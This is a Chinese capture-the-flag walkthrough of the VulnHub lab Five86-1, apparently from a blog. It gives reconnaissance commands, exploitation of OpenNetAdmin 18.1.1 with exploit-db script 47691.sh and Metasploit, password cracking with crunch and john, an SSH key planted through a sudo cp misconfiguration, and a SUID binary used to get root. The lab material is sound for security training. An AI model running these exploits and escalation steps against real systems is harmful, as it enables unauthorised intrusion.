vulnhub靶场之Five86-1

由于这些文章都是从我的hexo博客上面复制下来的,所以有的图片可能不是很完整,但是不受影响,如果有疑问,可以在评论区留言,我看到之后会回复。

一.环境搭建

1.靶场描述

Five86-1 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
 

只有一个flag

2.靶场地址

https://www.vulnhub.com/entry/five86-1,417/
 

image-20240110164851637

3.启动环境

image-20240110164800256

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24

二.渗透测试

1.目标

目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24

2.信息收集

(1)寻找靶场真实ip

nmap -sP 192.168.52.0/24
 

image-20240110165223225

arp-scan -l
 

image-20240110165420001

靶场真实ip地址为192.168.52.132

(2)探测端口及服务

nmap -A -v -p- 192.168.52.132
 

image-20240110165739019

发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
发现开启了80端口,Apache httpd 2.4.38 ((Debian))
发现开启了10000端口,MiniServ 1.920 (Webmin httpd)
 

MiniServ服务我是第一次见,百度一下

image-20240110205153717

也可以使用masscan进行探测

masscan --rate=10000 --ports 0-65535 192.168.52.132
 

(3)web指纹识别

whatweb -v 192.168.52.132
 

3.渗透测试

(1)访问web服务

http://192.168.52.132
 

image-20240110203640342

没有任何东西

还有一个10000端口,我们进行访问http://192.168.52.132:10000

image-20240110210030984

image-20240110210041105

访问发现了登录界面,但是这里初步尝试了SQL注入漏洞,失败了。这里使用暴力破解难度还是很大的,并且极其花费时间且需要一个足够强大的字典文件,果断放弃爆破,继续收集有用信息

(2)扫描web服务

1)棱洞3.0指纹识别
./EHole_linux_amd64 finger -u http://192.168.52.132
 

image-20240110204120425

2)nikto扫描网站结构
nikto -h http://192.168.52.132
 

image-20240110204525706

我们扫描到一个robots.txt文件,我们进行访问

http://192.168.52.132/robots.txt
 

看到一个/noa

image-20240110204401574

我们进行访问http://192.168.52.132/noa/,之前一直都没遇到过这种页面,百度查询一下opennetadmin

image-20240110204432319

image-20240110205527550

image-20240110205541731

查看一下版本信息,发现是18.1.1版本

3)dirsearch目录扫描
dirsearch -u 192.168.52.132 -e * -x 403 --random-agent
 

没有如何新的信息

(3)漏洞利用

1)搜索漏洞

打开漏洞库https://www.exploit-db.com/,搜索有无该软件对应版本的漏洞利用文件

image-20240110210345265

成功搜索到2个对应版本漏洞利用文件

2)kali搜索漏洞

在kali里面查询有无该版本的漏洞利用文件,如果有的话,直接就可利用

image-20240110210838654

找到了,并且RCE也对应上了,进入该目录

cd /usr/share/exploitdb/exploits/php/webapps
 

然后执行

./47691.sh http://192.168.52.132/ona/login.php
 

image-20240110212306274

我们可以看到攻击成功了,这里我们还可以使用另一个方法msfconsole进行攻击

3)msfconsole进行攻击

我们进行漏洞搜索

search opennetadmin
 

image-20240110220224839

直接输入漏洞利用文件路径进行使用

use 0
 

image-20240110220249481

查看需要配置那些参数

show options
 

image-20240110220328080

设置对应参数

set RHOSTS 192.168.52.132  (目标靶机IP地址)
set LHOST 192.168.52.152   (本机IP地址)
 

image-20240110220404471

image-20240110220430380

我们进行攻击

攻击成功

(4)提权

1)使用python切换至交互式shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
 

image-20240110220732262

我们进行搜集信息,一般情况下我们查看/var/www/html/路径文件

image-20240113162441485

我们查看两个文件,一个是robots.txt,一个是reports,但是都没有用

image-20240113162720372

我们查看隐藏文件,在reports目录中,发现了 .htaccess 隐藏文件,隐藏文件一般都会有提示信息,查看一下

是一个提示文件,提示我们/var/www/.htpasswd

image-20240113162951000

是一个用户的账户密码,提示密码10位数且只有aefhrt**这些字符,那我们可以使用crunch生成密码字典

2)crunch生成密码

image-20240113163218040

crunch 10 10 aefhrt -o /home/kali/桌面/MS02423.txt
 

Crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。使用Crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。

image-20240113163902653

成功在指定路径生成了密码字典文件,接下来再把douglas用户的密码保存到另外一个文件中,文件路径为:/root/user.txt

image-20240113164111098

3)john爆破密码

使用john爆破用户名密码

john --wordlist=/home/kali/桌面/MS02423.txt  /home/kali/桌面/user.txt   
 

爆破的时候突然卡住了,我把douglas用户的密码保存在了桌面上,爆破速度有点慢

image-20240113170245868

image-20240113170435451

爆破得到密码:fatherrrrr

4)ssh公匙免密登录jen用户

首先我们切换到douglas用户名,我们查看权限

image-20240113170825632

发现可以使用cp命令使用jen用户权限免密执行,同时在douglas根目录下,看到隐藏文件**.ssh**

进入.ssh目录,发现是ssh公钥

image-20240113171438974

在里面发现了id_rsa和id_rsa.pub两个文件,那么把它cp到jen目录下就可以使用ssh公匙免密登录jen了
将公钥复制到jen里:

cp id_rsa.pub /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh
ssh jen@192.168.52.132
 

我们可以看到登录成功,而且有一封邮件

image-20240113171926477

5)获取信息,得到moss用户密码

我们查看邮件,进入**/var/mail**邮箱路径进行查看

我们登录moss用户,我们查看权限

很可惜。moss用户无法以root权限执行任何命令

我们查看隐藏文件,看到有一个.games

image-20240113172952469

我们进行访问,看到有一个文件是root用户

我们进行访问,访问后发现一个root权限的二进制文件upyourgame,我们进行执行文件就获取到了root权限

image-20240113173159899

6)提权到root,查看flag

我们执行./upyourgame文件,然后一直输入yes即可

image-20240113173300213

我们查看flag

image-20240113173315261

三.相关资源

1.靶场下载地址

2.nmap

3.arp-scan

4.masscan

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)

7.nikto工具的使用

8.dirsearch目录扫描

9.msfconsole工具的使用

10.crunsh和john工具的使用

11.ssh公钥

12.opennetadmin漏洞利用

13.邮箱路径/var/mail

14.MiniServ服务

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/351225.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Vue2:通过代理服务器解决跨域问题

一、场景描述 现在的项目大多数是前后端分离的。Vue前端项目通过ajax去请求后端接口的时候,会有同源策略的限制。从而产生跨域问题。 二、基本概念 1、什么是同源策略? 就是前端服务和后端服务的协议名,IP或主机名,端口号不完…

达梦数据库——记录一次离谱的登录失败报错

好久没更新了哇 前面有整理过一些常见的数据库登录失败问题哈,今天记录一个遇到概率比较小,但碰上了一般不太容易找到原因的登录失败问题。 今天给客户同时初始化了三台服务器数据库,惟独这一台死活登不进去,满脑子问号&#xf…

k8s实例

k8s实例举例 (1)Kubernetes 区域可采用 Kubeadm 方式进行安装。 (2)要求在 Kubernetes 环境中,通过yaml文件的方式,创建2个Nginx Pod分别放置在两个不同的节点上,Pod使用动态PV类型的存储卷挂载…

【华为 ICT HCIA eNSP 习题汇总】——题目集10

1、以下哪个动态路由协议不能应用在 IPv6 网络中? A、IS-IS B、RIPng C、BGP4 D、OSPFv3 考点:路由技术原理 解析:(A) IS-ISv6 是在 IPv6 环境下,IS-IS 协议进行了相应的扩展和改进,以适应 IPv6…

Go语言grpc服务开发——Protocol Buffer

文章目录 一、Protocol Buffer简介二、Protocol Buffer编译器安装三、proto3语言指南四、序列化与反序列化五、引入grpc-gateway1、插件安装2、定义proto文件3、生成go文件4、实现Service服务5、gRPC服务启动方法6、gateway服务启动方法7、main函数启动8、验证 相关参考链接&am…

【AI大模型应用开发】1.2 Prompt Engineering(提示词工程)- 站在巨人的肩膀上,超实用!常用提示词整理

通过上两篇文章我们学习和实践了Prompt的书写要素、原则与技巧,以及了解了一些进阶的优化方法。 本来今天是想收集一些网上比较好的Prompt提示词,来与大家共同学习下别人的书写方式,吸取别人的经验,对Prompt有个更深入的理解。 但…

武忠祥2025高等数学,基础阶段的百度网盘+视频及PDF

考研数学武忠祥基础主要学习以下几个方面的内容: 1.微积分:主要包括极限、连续、导数、积分等概念,以及它们的基本性质和运算方法。 2.线性代数:主要包括向量、向量空间、线性方程组、矩阵、行列式、特征值和特征向量等概念,以及它们的基本…

第十七讲_HarmonyOS应用开发Stage模型应用组件

HarmonyOS应用开发Stage模型应用组件 1. 应用级配置2. Module级配置3. Stage模型的组件3.1 AbilityStage3.1.1 AbilityStage的创建和配置3.1.2 AbilityStage的生命周期回调3.1.3 AbilityStage的事件回调: 3.2 UIAbility3.2.1 UIAbility生命周期3.2.3 UIAbility启动模…

pinia实现todos

store/todos.js //导入defineStore import {defineStore} from pinia const userTodosStoredefineStore(todos,{ state:()>({// list:[// {id:1,name:吃饭,done:false},// {id:2,name:睡觉,done:true},// {id:3,name:打豆豆,done:false}// ],list:JSON.parse(l…

零基础学编程入门视频教程,中文编程轻松学

零基础学编程入门视频教程,中文编程轻松学 一、前言 不论是正在学习编程的大学生,还是IT人士或者是编程爱好者,在学习编程的过程中用正确的学习方法可以达到事半功倍的效果。对于初学者,可以先从中文编程入手,学习编…

vue3+echarts绘制某省区县地图

vue3echarts绘制某省区县地图 工作中经常需要画各种各样的图,echarts是使用最多的工具,接近春节,想把之前画的echarts图做一个整合,方便同事和自己随时使用,因此用vue3专门写了个web项目,考虑之后不断完善…

NVIDIA Isaac ROS - 入门教程(一)

系列文章目录 前言 欢迎访问 Isaac ROS,这是一套硬件加速、高性能、低延迟的 ROS 2 软件包,用于制造自主机器人,充分利用 Jetson 和其他英伟达平台的强大功能。 查看入门指南,开始使用 Isaac ROS。设置 Isaac ROS Buildfarm&…

前端工程化之:CSS工程化+Less

一、什么是Less? Less官网 Less中文网 Less 是一种更加简洁的样式代码,它非常像 CSS ,但又不太一样,它让编写样式变得更容易。 Less 代码虽好,但它无法被浏览器识别,因此需要一个工具将其转换为纯正的 CS…

大数据就业方向-(工作)ETL开发

上一篇文章: 大数据 - 大数据入门第一篇 | 关于大数据你了解多少?-CSDN博客 目录 🐶1.ETL概念 🐶2. ETL的用处 🐶3.ETL实现方式 🐶4. ETL体系结构 🐶5. 什么是ETL技术? &…

项目风采展示【TRDa】

桌面功能介绍: 1:支持本地音乐、三方音乐控制播放展示功能; 2:支持陀螺仪 3:支持蓝牙列表显示。

算法训练营Day60(单调栈)

84.柱状图的最大矩形 84. 柱状图中最大的矩形 - 力扣&#xff08;LeetCode&#xff09; 注意首尾加0的细节就可 class Solution {public int largestRectangleArea(int[] heights) {Deque<Integer> stack new LinkedList<>();int[] newHeight new int[heights.…

EasyCode使用指南—MybatisPlus模板

目录 1、下载EasyCode插件2、配置EasyCode2.1、配置作者名称2.2、配置代码内容生成模板&#xff08;模板内容见文末&#xff09;2.3、连接数据库2.4、使用代码内容生成模板 模板内容&#xff1a;controller.java.vmdto.java.vmmapper.java.vmmapper.xml.vmpojo.java.vmservice.…

ES的一些名称和概念总结

概念 先看看ElasticSearch的整体架构&#xff1a; 一个 ES Index 在集群模式下&#xff0c;有多个 Node &#xff08;节点&#xff09;组成。每个节点就是 ES 的Instance (实例)。每个节点上会有多个 shard &#xff08;分片&#xff09;&#xff0c; P1 P2 是主分片, R1 R2…

Nginx 主动检查 被动检查

被动检查 proxy_next_upstream http {upstrean httpget {//max_fail5,失败5词&#xff0c;直接下线 down&#xff0c;//fail_timeout10s, 10s之后 重新上线 up//fail_timeout10s, max_fail5,5次失败在10s内&#xff0c;下线&#xff0c;server IP:80 max_fails5 fail_time…

DDOS攻击有哪几种类型

DDOS攻击“分布式拒绝服务”是目前网站服务器所常见的恶意攻击&#xff0c;其原理是通过控制大量肉鸡(虚假流量)访问网站服务器消耗带宽、内存等资源&#xff0c;其目的是使得网站服务器无法正常的访问&#xff0c;其后果是直接导致企业业务受损&#xff0c;数据丢失&#xff0…